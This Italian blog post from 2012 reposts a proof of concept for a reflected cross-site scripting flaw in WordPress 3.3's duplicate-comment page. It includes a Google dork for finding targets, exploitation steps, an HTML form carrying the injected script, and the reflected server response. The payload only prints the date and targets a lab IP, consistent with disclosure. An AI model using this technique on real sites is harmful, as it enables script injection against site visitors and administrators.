[XSS]Reflected Cross Site Scripting vulnerability in wordpress 3.3

Nuovo bug per wordpress, 2 “Indian Security Experts” hanno trovato un Reflected Cross Site Scripting vulnerability nell’ultima versione di wordpress 3.3 :P

Il problema sta nello scrivere due volte lo stesso commento ;)
Vulnerability exploit the comment feature of WordPress Blog. Following two Steps mentioned in Exploit.

L’exploit è già stato inserito in wpscan
:)
La descrizione completa più il poc:

# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Dork: "Proudly powered by WordPress"
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE :  Nope.

Step 1: Post a comment to the target website

Step 2: Replace the value of author tag, email tag, comment tag with the exact value of what has been post in the last comment. Change the value of comment_post_ID to the value of post (which can be known by opening that post and checking the value of p parameter in the url). For example the if the url is http://192.168.1.102/wordpress/?p=6 then the value of comment_post_ID is 6.
<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me">
<input type="hidden" name="email" value="replace me">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="replace me">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace me">
<input type="hidden" name="comment_parent" value="0">
<input type="button" value="Click Me" />
</form>

</body>
</html>

Step 3: Publish the above html file on the web server and access it. Click on "Click Me" button. This will try to post the comment to wordpress which will flag this comment as duplicate comment with the 500 Internal server error response. Here our XSS payload will get executed. Check wordpress_3.3_xss.png file.

Step 4: The response code where XSS payload reflects is given below

<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono
-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>WordPress &rsaquo; Error</title>
	<style type="text/css">
		html {
			background: #f9f9f9;
		}
		body {
			background: #fff;
			color: #333;
			font-family: sans-serif;
			margin: 2em auto;
			padding: 1em 2em;
			-webkit-border-radius: 3px;
			border-radius: 3px;
			border: 1px solid #dfdfdf;
			max-width: 700px;
		}
		#error-page {
			margin-top: 50px;
		}
		#error-page p {
			font-size: 14px;
			line-height: 1.5;
			margin: 25px 0 20px;
		}
		#error-page code {
			font-family: Consolas, Monaco, monospace;
		}
		ul li {
			margin-bottom: 10px;
			font-size: 14px ;
		}
		a {
			color: #21759B;
			text-decoration: none;
		}
		a:hover {
			color: #D54E21;
		}

		.button {
			font-family: sans-serif;
			text-decoration: none;
			font-size: 14px !important;
			line-height: 16px;
			padding: 6px 12px;
			cursor: pointer;
			border: 1px solid #bbb;
			color: #464646;
			-webkit-border-radius: 15px;
			border-radius: 15px;
			-moz-box-sizing: content-box;
			-webkit-box-sizing: content-box;
			box-sizing: content-box;
		}

		.button:hover {
			color: #000;
			border-color: #666;
		}

		.button {
			background: #f2f2f2 url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad.png) repeat-x scroll left top;
		}

		.button:active {
			background: #eee url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad-active.png) repeat-x scroll left top;
		}
			</style>
</head>
<body id="error-page">
	<p>Duplicate comment detected; it looks as though you&#8217;ve already said that!</p></body>
</html>

Vi ricordo che il poc non è pronto all’uso se volete testarlo non basta copiarlo e incollarlo :D so solo che funziona :)
Vi consiglio la lettura di :
[WordPress]From XSS to Admin {Bypass WPNONCE}

[Video]Exploit, SQL INJECTION WordPress

Related posts:

1. Aggiungiamo: Anteprima Articolo a wordpress
2. [How-To]Metasploit && XSSF – Cross-Site Scripting Framework v.2.1
3. [WordPress] Redirection Plugin
4. WPScan: Another WordPress Security/Vulnerability Scanner
5. [WordPress]From XSS to Admin {Bypass WPNONCE}

This entry was posted on Tuesday, January 3rd, 2012 at 11:22 am and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: attack • remote • wordpress • xss